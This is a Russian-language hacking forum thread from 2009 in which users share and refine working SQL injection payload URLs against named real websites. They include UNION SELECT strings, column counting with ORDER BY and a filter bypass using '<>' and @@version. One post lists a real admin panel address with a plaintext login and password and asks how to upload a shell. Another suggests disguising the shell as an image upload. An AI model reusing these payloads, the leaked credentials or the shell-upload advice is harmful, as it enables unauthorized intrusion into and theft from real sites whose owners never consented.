18.03.2009, 10:54
|
|
Познающий
Регистрация: 19.11.2006
Сообщений: 32
С нами:
10249722
Репутация:
5
|
|
Привет
Вопрос по HTTP 1.1, а конкретно про метод PUT
Почему могу с почью PUT создать txt и не могу создать asp? можно ли это обойти другими методами (copy, move, unlock .....)?
второй вопрос. имеется файл web.config или xxx.asp. При COPY в txt - ошибка. Я так понемаю такая же причина что и в первом вопросе.
Есть ли какие мнения?
|
|
|
18.03.2009, 10:57
|
|
Познающий
Регистрация: 19.11.2006
Сообщений: 32
С нами:
10249722
Репутация:
5
|
|
hi there
http://www.nbt.tj/?c=44&id=44&a=-1+union+select+1,version(),3,4,5/*
portbld-freebsd6.2
nbt@localhost
4.0.27
nbt
дальше не идет...
у кого получится, киньте в личку, как сделали...
там я так смотрю очень права порезаны. остается подбор таблиц - 2 уже есть - выводятся при не правельном запросе. можно еще поиграться с INSERT, LOAD_FILE - но не думаю что из этого что либо получится - все из-за тех же прав.
|
|
|
|
18.03.2009, 11:01
|
|
Познающий
Регистрация: 19.11.2006
Сообщений: 32
С нами:
10249722
Репутация:
5
|
|
2 Imperrous
Мне кажется что там вообще нет sql inj. ошибки работы скрипта.
|
|
|
|
18.03.2009, 11:36
|
|
Познающий
Регистрация: 28.10.2008
Сообщений: 43
С нами:
9229334
Репутация:
125
|
|
_http://www.nbt.tj/?c=44&id=44&a=-1+union+select+1,column_name,3,4,5'/*
|
|
|
|
18.03.2009, 12:56
|
|
Участник форума
Регистрация: 12.11.2006
Сообщений: 213
С нами:
10260776
Репутация:
185
|
|
Сообщение от HIVER
_http://www.nbt.tj/?c=44&id=44&a=-1+union+select+1,column_name,3,4,5'/*
Тут к information_schema нет прав. Это значит, надо брутить имена талиц и столбцов. Я б SIPTом пробежал, по словарю.
|
|
|
|
18.03.2009, 15:27
|
|
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
С нами:
9567480
Репутация:
61
|
|
Привет я только начинаю изучать SQL-inj и по этому прошу вас помочь.
http://www.bookstreet.ru/prod_show.php?object_uid=2'
Почему не идёт? Или не стоило мне браться за MS SQL? (в запросах MS SQL не силён вообще)
|
|
|
|
18.03.2009, 16:11
|
|
Новичок
Регистрация: 15.12.2008
Сообщений: 11
С нами:
9159510
Репутация:
6
|
|
помогите раскрутить (:
http://www.danieldefo.ru/gallery.html?top=1'
Она слепая?)
|
|
|
|
18.03.2009, 16:22
|
|
Участник форума
Регистрация: 28.12.2008
Сообщений: 136
С нами:
9140897
Репутация:
90
|
|
http://siovizcenter.ucsd.edu/admin/
rnewman:hot98DOG
Как сюда шелл залить? Возможно?
|
|
|
|
18.03.2009, 16:32
|
|
Познающий
Регистрация: 19.11.2006
Сообщений: 32
С нами:
10249722
Репутация:
5
|
|
Привет я только начинаю изучать SQL-inj и по этому прошу вас помочь.
http://www.bookstreet.ru/prod_show.php?object_uid=2'
Почему не идёт? Или не стоило мне браться за MS SQL? (в запросах MS SQL не силён вообще)
http://www.bookstreet.ru/prod_show.php?object_uid=2+order+by+2--
если больше 2 - то ошибка
The ORDER BY position number 3 is out of range of the number of items in the select list.
а дальше вот что
'=' - режет
'select' -режет (видно из запроса http://www.bookstreet.ru/prod_show.php?object_uid=2+union+select+1,2'-- )
Unclosed quotation mark before the character string '2 union 1,2\' '.
как видно SELECT в запросе убран
тк = режется использовать можно <>
http://www.bookstreet.ru/prod_show.php?object_uid=2+and+1<>@@version--
а дальше читай тут
http://injection.rulezz.ru/MSSQL-ASP-Injection.html
|
|
|
|
18.03.2009, 16:32
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
С нами:
9721141
Репутация:
1013
|
|
+++AndreyDevil+++, не смотрел. но попробуй залить как картинку, или побалуйся с расширением файла.
sj666, какая ж она слепая?))
_http://www.nbt.tj/?c=44&id=44&a=-1+union+select+1,column_name,3,4,5'/*
версия бд - 4.0.27-log. а инф.схема появляеться только в пятой.
Последний раз редактировалось faza02; 18.03.2009 в 16:38..
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
